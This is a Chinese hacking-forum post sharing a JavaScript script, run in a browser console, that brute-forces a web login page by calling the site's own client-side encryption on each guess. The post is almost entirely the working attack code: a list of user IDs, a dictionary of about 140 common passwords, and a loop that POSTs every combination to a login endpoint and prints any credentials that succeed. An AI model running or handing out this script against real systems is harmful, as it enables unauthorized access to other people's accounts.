查看: 11981|回复: 0

使用js 脚本爆破自定义加密

[复制链接]
发表于 2021-12-27 16:17:44 | 显示全部楼层 |阅读模式
优势:
1. js 加密,再通过js 解密省去了分析加密过程
2 . 异步速度很快
3. 无需部署其它环境,一个浏览器就够了

如网站没引用jquery,须引用外部jquery

以下为代码部分:
[AppleScript] 纯文本查看 复制代码
// [url]http://192.168.1.9:8000/home/Account/LogOn[/url] 
// 定义用户名部分
var uids = ["admin","2311","7245","2627","7243","6100","2970","6939","6549","6696","8006","6733","8224","8007","6132"]

// var uids=["admin"]
//定义密码列表
var pass = ["!QAZ6yhn","000000","000000000","0000000000","0000000000000000","0123456789","110120119","111111","111111111","1111111111","1111111111111111","123.mima","123123","123123123","1233211234567","1234.com","1234554321","123456","123456.","123456..","123456789","123456789.","123456789..","1234567890","12345678900","1234567891","12345678910","1234567891234567","1234567899","123456789a","123456789abc","123456789q","123456789qq","123456a","123456aa","123456abc","123456asd","123456q","123456qq","123698745","123abc","1314520520","135792468","1357924680","147258369","1472583690","1qaz!QAZ2wsx@WSX","1qaz#EDC5tgb","1qaz2wsx!QAZ@WSX","1qaz@WSX","1qaz@WSX3edc","1qaz@wsx","2wsx#EDC","3edc$RFV","5201314","5201314520","52013145201314","5841314520","5tgb^YHN","6yhn&UJM","741852963","7708801314520","789456123","7894561230","987654321","9876543210","AAA111...","Aa111111","Abc@1234","Abcd1234","Hello01!","Hema1111","MIMA.123","Qwe123!@#","Welcome123","Welcome1234","a123123","a123456","a12345678","a123456789","a5201314","aa123456","aa123456789","aaa123456","abc123","abc123456","abc123456789","abcd123","abcd1234","abcd123456","aini1314","as123456","asd123","asd123456","asdASD123!@#","asdfghjkl","caonima","fir2k7st","mima..123","mima.123","mima.1234","mima.321","mima.456","mima123.","nopass.1","nopass.2","password1!","q123456","q123456789","qaz123456","qazwsxedc","qazxsw.123","qq123456","qq123456789","qq5201314","qwe123","qwe123456","qwe567,.","qwerty","qwertyuiop","w123456","w123456789","wang123456","woaini","woaini123","woaini1314","woaini1314520","woaini520","woaini521","www123456","z123456","z123456789","zxc123","zxc123.0","zxc123456","zxcvbnm","zxcvbnm123"]

var count = uids.length * pass.length
console.info("[i]INFO: 一共需要请求:"+count+"次\n")
//定义登录接口
var url = "http://192.168.1.9:8000/home/account/LogOn"

//请求主体,及表单部分
function p(url,uid,pass){
  // js密码加密部分
  enpass = do_encrypt_slim(getmd5str(pass)) 
	$.ajax({
		url : url,
		type : "POST",
    async : false,
		data : {	
			usercode:uid,
			password:enpass,
			phonecheckword:null
		},
		success : function(data){
			if(data.flag != false){
      console.log("%c[+] login successful!\n"+"Loginid:"+uid+"\tpassword:"+pass+"\tusername:\t"+data.username+"\n","color: green")
			}else{
        console.warn("[-] Login failed !\t当前尝试用户:"+ uid +"\t信息:"+data.msg+"\n")
      }
		},
    timeout: 1000 //防止卡死
	});
}

for (uint =0; uint<=uids.length-1;uint++){
  for (i = 0; i<=pass.length-1;i++){
    p(url,uids[uint],pass[i]);
     
  }
}


效果图

Fjtr7YsJZ2h_I4edDk1bVsEDJQDu.png
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-1 23:37 , Processed in 0.297229 second(s), 23 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部